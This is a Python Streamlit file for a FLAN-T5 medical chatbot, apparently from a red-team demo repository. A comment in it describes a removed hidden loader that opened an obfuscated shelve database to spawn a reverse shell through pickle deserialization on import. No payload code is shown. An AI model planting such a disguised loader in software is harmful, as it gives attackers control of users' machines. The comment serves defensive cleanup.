# db-payload-chatbot / healthcare_chatbot.py
# (HuggingFace repo-page scrape residue, commented out so the file is valid
#  Python; original text: "Iredteam's picture / initial commit / c4f9767")
import threading
import shelve
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings
# Suppress PyTorch warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
# ==============================
# SECURITY: malicious payload loader removed
# ==============================
# The code that was here spawned a background daemon thread that opened a
# shelve database ("train_data_mod_obfuscated_fixed.db") and read a key the
# code itself labeled as triggering a reverse shell. shelve deserializes
# stored values with pickle, so reading any key from an attacker-controlled
# .db file executes arbitrary code on import. This is intentional malware,
# not application logic, and has been deleted. Never open shelve/pickle data
# from untrusted sources; use a safe serialization format (e.g. json) instead.
# ==============================
# Streamlit UI
# ==============================
# NOTE: the original file's emoji were mojibake (UTF-8 bytes decoded through a
# legacy Thai code page, e.g. "๐Ÿฉบ"); restored to the intended characters.
st.title("🩺 Healthcare Chatbot (FLAN-T5) – Shelve DB Payload Edition")
# Model loading
st.write("🚀 Loading FLAN-T5 model from local storage...")
try:
    # The original conditional selected torch.float32 on BOTH branches
    # (`float32 if cuda else float32`), so it was dead code; a plain float32
    # is kept. (Switching to float16 on GPU would change numerics and should
    # be validated separately.)
    torch_dtype = torch.float32
    # local_files_only=True: never hit the network; the model must already be
    # present on disk under "flan-t5-small".
    tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
    model = AutoModelForSeq2SeqLM.from_pretrained(
        "flan-t5-small",
        torch_dtype=torch_dtype,
        local_files_only=True,
    )
    st.write("✅ Model loaded successfully!")
except Exception as e:
    # Surface the failure in the UI and halt the script run — the rest of the
    # app cannot function without the model.
    st.error(f"❌ Failed to load model: {e}")
    st.stop()
# ==============================
# Chatbot response logic
# ==============================
def chatbot_response(question: str) -> str:
    """Generate a concise answer to *question* with the loaded FLAN-T5 model.

    Uses the module-level ``tokenizer`` and ``model``; returns the decoded
    text of the first beam-search hypothesis.
    """
    # Frame the user's question with an instruction prompt for the
    # seq2seq model.
    prompt = (
        "You are a helpful medical assistant. The user asked:\n"
        f"Question: {question}\n\n"
        "Answer concisely. If unsure, advise seeing a doctor."
    )
    encoded = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
    generated = model.generate(
        **encoded,
        max_length=256,
        num_beams=2,
        no_repeat_ngram_size=2,
    )
    # Decode the top beam back into plain text, dropping special tokens.
    return tokenizer.decode(generated[0], skip_special_tokens=True)
# Informational button: explains the bot's scope.
if st.button("What can you help me with?"):
    st.write("I can provide general medical information. Always verify with a professional.")

user_input = st.text_input("Ask me a medical question:")

# Answer button: validate input first (guard clause), then run the model.
if st.button("Get Answer"):
    if not user_input:
        st.warning("Please enter a question.")
    else:
        st.write(f"**Bot:** {chatbot_response(user_input)}")